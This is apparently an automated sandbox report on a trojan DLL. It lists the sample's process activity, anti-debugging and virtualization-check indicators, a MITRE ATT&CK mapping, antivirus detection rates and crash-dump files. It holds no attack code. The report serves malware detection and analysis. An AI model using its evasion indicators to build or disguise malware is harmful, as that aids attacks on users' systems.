Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbe source: WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp
Source: Binary string: mscms.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: avicap32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.261050862.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260797033.00000000050B0000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285777005.0000000005080000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.251566449.000000000351C000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.250660218.0000000000C5A000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.262553693.0000000000B9A000.00000004.00000001.sdmp
Source: Binary string: ODBC32.pdbOa source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.261011560.00000000057A1000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.260757907.0000000004F31000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.285705415.00000000050B1000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.260807722.00000000050B7000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.285836070.0000000005087000.00000004.00000040.sdmp
Source: Binary string: mscms.pdb>t< source: WerFault.exe, 00000009.00000003.261068482.0000000005776000.00000004.00000040.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02CEC28A push ds; iretd 12_2_02CEC29E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02CEC993 push ds; iretd 12_2_02CEC99E
Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: WerFault.exe, 0000000E.00000003.308936840.0000000004C13000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWP
Source: WerFault.exe, 00000009.00000002.301040929.00000000051BF000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.301075274.0000000004B73000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.317002782.0000000004B47000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000009.00000002.301542912.0000000005298000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100010A0 mov eax, dword ptr fs:[00000030h]2_2_100010A0
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll',#1Jump to behavior
Source: rundll32.exe, 00000002.00000000.243878179.00000000039B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.244635172.0000000003600000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.251961267.00000000036C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000000.243878179.00000000039B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.244635172.0000000003600000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.251961267.00000000036C0000.00000002.00020000.sdmpBinary or memory string: Progman
Source: rundll32.exe, 00000002.00000000.243878179.00000000039B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.244635172.0000000003600000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.251961267.00000000036C0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
Source: rundll32.exe, 00000002.00000000.243878179.00000000039B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.244635172.0000000003600000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.251961267.00000000036C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 00000002.00000000.243878179.00000000039B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.244635172.0000000003600000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.251961267.00000000036C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Rundll321OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion11LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSVirtualization/Sandbox Evasion11Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 483798 Sample: SecuriteInfo.com.Trojan.Age... Startdate: 15/09/2021 Architecture: WINDOWS Score: 56 27 Antivirus / Scanner detection for submitted sample 2->27 29 Multi AV Scanner detection for submitted file 2->29 8 loaddll32.exe 1 2->8         started        process3 process4 10 rundll32.exe 8->10         started        12 cmd.exe 1 8->12         started        14 rundll32.exe 8->14         started        process5 16 WerFault.exe 3 9 10->16         started        19 rundll32.exe 12->19         started        21 WerFault.exe 9 14->21         started        dnsIp6 25 192.168.2.1 unknown unknown 16->25 23 WerFault.exe 22 9 19->23         started        process7

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll63%VirustotalBrowse
SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll29%MetadefenderBrowse
SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll75%ReversingLabsWin32.Trojan.Spynoon
SecuriteInfo.com.Trojan.Agent.FHBA.20741.dll100%AviraHEUR/AGEN.1142362

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.2.rundll32.exe.10000000.0.unpack100%AviraHEUR/AGEN.1142362Download File
12.0.rundll32.exe.10000000.1.unpack100%AviraHEUR/AGEN.1142362Download File
2.0.rundll32.exe.10000000.1.unpack100%AviraHEUR/AGEN.1142362Download File
3.0.rundll32.exe.10000000.1.unpack100%AviraHEUR/AGEN.1142362Download File
3.2.rundll32.exe.10000000.0.unpack100%AviraHEUR/AGEN.1142362Download File
12.2.rundll32.exe.10000000.0.unpack100%AviraHEUR/AGEN.1142362Download File
2.0.rundll32.exe.10000000.0.unpack100%AviraHEUR/AGEN.1142362Download File
12.0.rundll32.exe.10000000.0.unpack100%AviraHEUR/AGEN.1142362Download File
3.0.rundll32.exe.10000000.0.unpack100%AviraHEUR/AGEN.1142362Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://watson.telemetry.mSg0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://watson.telemetry.mSgWerFault.exe, 0000000A.00000002.301075274.0000000004B73000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:483798
Start date:15.09.2021
Start time:13:54:39
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 4s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:SecuriteInfo.com.Trojan.Agent.FHBA.20741.16185 (renamed file extension from 16185 to dll)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:33
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.winDLL@12/12@0/1
EGA Information:Failed
HDC Information:
  • Successful, ratio: 100% (good quality ratio 100%)
  • Quality average: 68.5%
  • Quality standard deviation: 31.5%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 1
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 204.79.197.200, 13.107.21.200, 52.168.117.173, 20.50.102.62, 13.89.179.12, 40.112.88.60, 23.216.77.208, 23.216.77.209
  • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
  • Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

TimeTypeDescription
13:55:40API Interceptor1x Sleep call for process: loaddll32.exe modified
13:56:02API Interceptor3x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_319baef4101f2973dda1833cdb25524ddf68727_82810a17_037c2054\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13856
Entropy (8bit):3.7644506551629697
Encrypted:false
SSDEEP:192:oXKib0oXYHBUZMX4jed+WbZaB/u7sAS274ItWc8:xiFXABUZMX4jetgB/u7sAX4ItWc8
MD5:55D69FCC221DF5ECC6B86E05BAE57FEE
SHA1:9BE7CBC355F85BF5CBCB65E617593414C3B25F15
SHA-256:861068C4CCE44E75672C4127970C3E3BD40C22352F75746E3569070E42448D9D
SHA-512:D787232F16D0B8441A29AB8BF31512A0E24F5B1B9AD23F827B5CDBC3C64634922FF80EE58D39C30720A64398F635303402241CA8465BFB181596EBE43F33EA1F
Malicious:false
Reputation:low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.2.1.2.9.4.2.9.2.2.6.7.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.2.1.2.9.6.0.5.7.8.8.8.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.3.c.e.0.7.4.-.d.d.6.e.-.4.5.c.3.-.a.e.3.4.-.7.5.7.2.c.0.a.3.8.c.d.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.a.4.e.e.d.f.-.1.b.3.5.-.4.e.2.e.-.b.4.c.0.-.a.f.9.0.a.4.8.9.f.3.d.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.d.8.-.0.0.0.1.-.0.0.1.6.-.4.4.3.6.-.6.b.0.8.7.4.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_319baef4101f2973dda1833cdb25524ddf68727_82810a17_0b983b00\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13858
Entropy (8bit):3.7656137962971967
Encrypted:false
SSDEEP:192:INDis0oXHHBUZMX4jed+9buvG/u7sAS274ItWcy:kiqXnBUZMX4jeOCG/u7sAX4ItWcy
MD5:317DB4323B765F81B014D9D98CCAF111
SHA1:3BD88F8282440A70A250C9F8E6FD2CCF3F176C38
SHA-256:300DFC2AA34B1859D0A5BF9EAB9A271724AB98C11904E8727293C208E0FA9086
SHA-512:4782F55BAA4A279CC6A1986552659632EC7CD6BAC7136CEA45F53A5A990807EC086473CC09EF51B8E17F6E153B7607C5B2CA7AB89533A667EAAE0DD523378A8D
Malicious:false
Reputation:low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.2.1.2.9.4.8.5.0.3.3.8.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.2.1.2.9.6.7.7.0.6.4.7.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.1.7.4.7.2.9.-.f.0.7.9.-.4.2.f.a.-.a.d.6.7.-.0.0.c.f.f.f.b.0.4.e.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.2.a.6.c.6.7.-.f.a.6.2.-.4.4.5.d.-.a.0.8.d.-.e.b.2.8.2.8.9.6.b.1.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.f.4.-.0.0.0.1.-.0.0.1.6.-.5.6.8.9.-.8.b.0.a.7.4.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_319baef4101f2973dda1833cdb25524ddf68727_82810a17_14efad18\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13858
Entropy (8bit):3.765102037821312
Encrypted:false
SSDEEP:192:5gi9x0oXzHBUZMX4jed+V3ceJ/u7sbS274ItWcy:qi9/XzBUZMX4jemsA/u7sbX4ItWcy
MD5:1212155A94E3B4F2BDE2E18E2A2A54D3
SHA1:EBF175BCBBE55D99B0E139C2F5D820BE8AD50466
SHA-256:CFD4CDAA362A48FC99F1ECCAEAB6FAAF67D1E32F2A44C979AB9660D471948188
SHA-512:D0A0FBDF86769148DDB49427695BDEDC51527A9C8BCE765FF4198B649BED364242187B84B26F4FD082A913763A0CACE3D38EE27CFADACDA940D07A2D7C2DEC42
Malicious:false
Reputation:low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.2.1.2.9.4.2.9.5.4.7.3.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.2.1.2.9.6.1.2.6.7.1.8.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.1.6.0.d.9.0.-.8.2.1.7.-.4.3.a.f.-.a.c.b.6.-.2.1.b.2.8.4.4.5.a.4.f.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.4.d.0.1.4.7.-.2.1.f.3.-.4.8.e.6.-.9.5.1.0.-.e.6.4.b.f.b.6.f.e.6.e.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.0.4.-.0.0.0.1.-.0.0.1.6.-.f.7.3.7.-.6.e.0.8.7.4.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E6B.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Wed Sep 15 20:55:46 2021, 0x1205a4 type
Category:dropped
Size (bytes):54826
Entropy (8bit):2.0688427633566238
Encrypted:false
